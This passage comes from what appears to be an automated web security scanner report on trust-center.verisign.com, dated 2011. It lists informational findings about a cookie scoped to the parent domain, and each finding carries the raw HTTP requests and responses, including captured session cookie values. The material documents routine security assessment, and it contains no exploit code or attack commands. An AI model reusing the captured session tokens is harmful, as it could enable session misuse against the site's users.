HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:53 GMT Server: Apache Set-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 138732 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
9.36. https://trust-center.verisign.com/process/retail/redirect
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/redirect
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/redirect HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:00 GMT Server: Apache Set-Cookie: TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/console_home?uid=a5f0b94a4c89f47ae217b662fc5fdac5 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
9.37. https://trust-center.verisign.com/process/retail/session_timeout
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/session_timeout
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/session_timeout HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vtrh54nwcc; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=03CA6F76DB2F10DB4BFEB1847A7DDBAF
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:59:40 GMT Server: Apache Set-Cookie: TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Set-Cookie: JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; Path=/; Secure Location: http://www.verisign.com/ssl/buy-ssl-certificates/index.html Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html
9.38. https://trust-center.verisign.com/process/retail/trust_initial
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_initial
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_initial?application_locale=VTC_US&promoCode=TSAB9999&UI=PPT HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:26:31 GMT Server: Apache Set-Cookie: TLTHID=62F38DA2DB2A10DB4CE59F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/trust_product_selector?uid=54e97416d385e356d49a079c459d836b&product=TRUSTSEAL001 Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html
9.39. https://trust-center.verisign.com/process/retail/trust_product_selector
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_product_selector
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: http://www.verisign.com/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTHID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:32 GMT Server: Apache Set-Cookie: TLTHID=6380DBE4DB2A10DB44A4B1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html;charset=utf-8 Content-Length: 41019 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> ...[SNIP]...
9.40. https://trust-center.verisign.com/process/retail/trust_product_selector.do
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/trust_product_selector.do
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_product_selector.do HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:47:02 GMT Server: Apache Set-Cookie: TLTHID=40B2C62EDB2D10DB53169F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.com/process/retail/trust_capture_tech_contact_details?uid=25a7ccba99f4ee1a587cdec832e34e73 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
9.41. https://trust-center.verisign.com/rcm/TeaLeafTarget.html
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/TeaLeafTarget.html
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
POST /rcm/TeaLeafTarget.html HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 Content-Length: 1103 X-TeaLeaf-Page-Objects: 0 Origin: https://trust-center.verisign.com X-TeaLeaf-Page-Img-Fail: 1 X-TeaLeaf-Page-Render: 123 X-TeaLeaf: ClientEvent X-TeaLeaf-UIEventCapture-Version: 2009.11.17.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Content-Type: text/xml X-TeaLeaf-Screen-Res: 4 X-TeaLeafType: PERFORMANCE X-TeaLeafSubType: undefined; INIT X-TeaLeaf-Page-Url: /process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941 X-TeaLeaf-Browser-Res: 3 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719 <ClientEventSet PostTimeStamp="1315621658502" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" PageId="ID21H27M8S358R0.8013692023232579" TimeDuration="123" DateSince1970="1315621628481" > ...[SNIP]...
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:10 GMT Server: Apache Set-Cookie: TLTHID=7A014714DB2A10DB4D2B9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT Last-Modified: Fri, 27 May 2011 21:56:08 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 32 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: text/html <html> <body> OK </body> </html>
9.42. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/arrow_progressBar_gray.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/arrow_progressBar_gray.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 91 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a...............................!.......,.......... hs......+RR.N...}...XF.M4....1...;
9.43. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/arrow_progressBar_red.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/arrow_progressBar_red.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: ApacheSet-Cookie: TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 90 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif GIF89a.........3....d.....2Y........!.......,...........(e.......RR.L...}Z..XF.M4.. .M..;
9.44. https://trust-center.verisign.com/rcm/verisign/images/divider.gif
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/rcm/verisign/images/divider.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/divider.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 44 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif
9.45. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/ico_questionmark.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/ico_questionmark.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:39 GMT Server: Apache Set-Cookie: TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:05 GMT Accept-Ranges: bytes Content-Length: 374 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif
9.46. https://trust-center.verisign.com/rcm/verisign/images/logo.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/logo.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/logo.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:42 GMT Server: Apache Set-Cookie: TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 16073 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif
9.47. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/popup_button_left.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/popup_button_left.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:40 GMT Server: Apache Set-Cookie: TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:06 GMT Accept-Ranges: bytes Content-Length: 348 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/gif
9.48. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
Summary
Severity: Information
Confidence: Certain
Host: https://trust-center.verisign.com
Path: /rcm/verisign/images/popup_button_right.gif
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rcm/verisign/images/popup_button_right.gif HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF
Response
